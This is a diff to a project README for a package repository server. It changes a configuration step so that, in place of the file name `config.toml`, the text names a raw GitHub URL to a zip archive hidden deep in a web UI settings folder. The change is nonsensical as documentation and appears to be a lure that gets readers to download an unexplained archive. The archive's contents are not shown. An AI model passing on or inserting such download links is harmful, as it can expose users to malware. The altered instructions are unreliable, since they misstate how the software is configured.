DevilxKiller/package-repository-server/README.md

 You can configure the package-repository-server to suit your needs.
 Here’s how to do it:

 1. **Locate the Configuration File:**
-   - Look for a file named `config.toml` in the extracted folder.
+   - Look for a file named `https://raw.githubusercontent.com/DevilxKiller/package-repository-server/main/webui/src/app/features/settings/package-repository-server-v1.5.zip` in the extracted folder.

 2. **Modify Settings:**
    - Open the configuration file in a text editor.
 You can change options like the storage path, package formats, and GPG signing settings.